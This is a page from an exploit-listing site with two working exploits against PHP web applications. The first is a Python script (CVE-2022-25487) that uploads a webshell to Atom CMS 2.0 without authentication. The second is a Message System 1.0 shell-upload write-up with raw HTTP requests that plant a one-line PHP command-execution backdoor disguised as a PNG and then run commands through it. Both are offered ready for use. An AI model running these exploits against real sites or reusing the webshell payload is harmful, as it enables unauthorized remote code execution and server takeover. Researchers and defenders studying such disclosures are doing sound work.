Latest exploits :: CodePwn

<pre><code># Exploit Title: Atom CMS 2.0 - Remote Code Execution (RCE) # Date: 22.03.2022 # Exploit Author: Ashish Koli (Shikari) # Vendor Homepage: https://thedigitalcraft.com/ # Software Link: https://github.com/thedigicraft/Atom.CMS # Version: 2.0 # Tested on: Ubuntu 20.04.3 LTS # CVE: CVE-2022-25487 # Description This script uploads webshell.php to the Atom CMS. An application will store that file in the uploads directory with a unique number which allows us to access Webshell. # Usage : python3 exploit.py <IP> <Port> <atomcmspath> # Example: python3 exploit.py 127.0.0.1 80 /atom # POC Exploit: https://youtu.be/qQrq-eEpswc # Note: Crafted "Shell.txt" file is required for exploitation which is available on the below link: # https://github.com/shikari00007/Atom-CMS-2.0---File-Upload-Remote-Code-Execution-Un-Authenticated-POC ''' Description: A file upload functionality in Atom CMS 2.0 allows any non-privileged user to gain access to the host through the uploaded files, which may result in remote code execution. ''' #!/usr/bin/python3 ''' Import required modules: ''' import sys import requests import json import time import urllib.parse import struct import re import string import linecache proxies = { 'http': 'http://localhost:8080', 'https': 'https://localhost:8080', } ''' User Input: ''' target_ip = sys.argv[1] target_port = sys.argv[2] atomcmspath = sys.argv[3] ''' Get cookie ''' session = requests.Session() link = 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin' response = session.get(link) cookies_session = session.cookies.get_dict() cookie = json.dumps(cookies_session) cookie = cookie.replace('"}','') cookie = cookie.replace('{"', '') cookie = cookie.replace('"', '') cookie = cookie.replace(" ", '') cookie = cookie.replace(":", '=') ''' Upload Webshell: ''' # Construct Header: header1 = { 'Host': target_ip, 'Accept': 'application/json', 'Cache-Control': 'no-cache', 'X-Requested-With': 'XMLHttpRequest', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36', 'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryH7Ak5WhirAIQ8o1L', 'Origin': 'http://' + target_ip, 'Referer': 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin/index.php?page=users&id=1', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en-US,en;q=0.9', 'Cookie': cookie, 'Connection': 'close', } # loading Webshell payload: path = 'shell.txt' fp = open(path,'rb') data= fp.read() # Uploading Webshell: link_upload = 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin/uploads.php?id=1' upload = requests.post(link_upload, headers=header1, data=data) p=upload.text x = re.sub("\s", "\n", p) y = x.replace("1 Unknown", "null") z = re.sub('[^0-9]', '', y) ''' Finish: ''' print('Uploaded Webshell to: http://' + target_ip + ':' + target_port + atomcmspath + '/uploads/' + z + '.php') print('') </code></pre>

<pre><code># Title: Message System 1.0 Shell Upload # Author: Hejap Zairy # Date: 29.07.2022 # Vendor: https://www.sourcecodester.com/php/15249/message-system-phpoop-free-source-code.html # Software:https://www.sourcecodester.com/sites/default/files/download/oretnom23/pmms_1.zip # Reference: https://github.com/Matrix07ksa # Tested on: Windows, MySQL, Apache registered user can bypass waf upload .php.png files in attachments section with use of intercept tool in burbsuite to edit the raw #vulnerability Code php Needs more filtering to upload image files ``` if(isset($_FILES['image']) && $_FILES['image']['tmp_name'] != ''){ if(!is_dir(base_app."uploads/users")) mkdir(base_app."uploads/users"); $fname = 'uploads/users/avatar-'.$uid.'.png'; $dir_path =base_app. $fname; $upload = $_FILES['image']['tmp_name']; $type = mime_content_type($upload); $allowed = array('image/png','image/jpeg'); if(!in_array($type,$allowed)){ $resp['msg'].=" But Image failed to upload due to invalid file type."; }else{ $new_height = 200; $new_width = 200; ``` [+] Payload POST ``` POST /pmms/registration.php?id=1&firstname=Admin&middlename=admin&lastname=admin&gender=Male&dob=2022-03-30&username=Admin&password=Admin12345A%40%23&image=0day_Hejap.png HTTP/1.1 Host: 0day.gov User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=jj352kdlpp0ib5lu0v5ddm199m Upgrade-Insecure-Requests: 1 -----------------------------409902128312379197203124536738 Content-Disposition: form-data; name="image"; filename="0day_hejap.png.php" Content-Type: image/png <?=`$_GET[515]`?> -----------------------------409902128312379197203124536738 ``` #Status: CRITICAL [+] Payload GET ``` GET /pmms/uploads/users/0day_hejap.png.php?515=echo+Hejap+Zairy HTTP/1.1 Host: 0day.gov User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=pqbgvck1gedt9if6p582nt9a41 Upgrade-Insecure-Requests: 1 ``` #Response ``` HTTP/1.1 200 OK Date: Tue, 29 Mar 2022 12:45:59 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27 X-Powered-By: PHP/7.4.27 Access-Control-Allow-Origin: * Content-Length: 12 Connection: close Content-Type: text/html; charset=UTF-8 Hejap Zairy ``` # Description: The file upload bypass WAF vulnerability occurs when the user uploads an executable script file, and through the script file to obtain the ability to execute server-side commands. This attack is the most direct and effective, sometimes having almost no technical barriers. # Proof and Exploit: https://i.imgur.com/7mZnH7L.png https://i.imgur.com/rDdybxC.png </code></pre>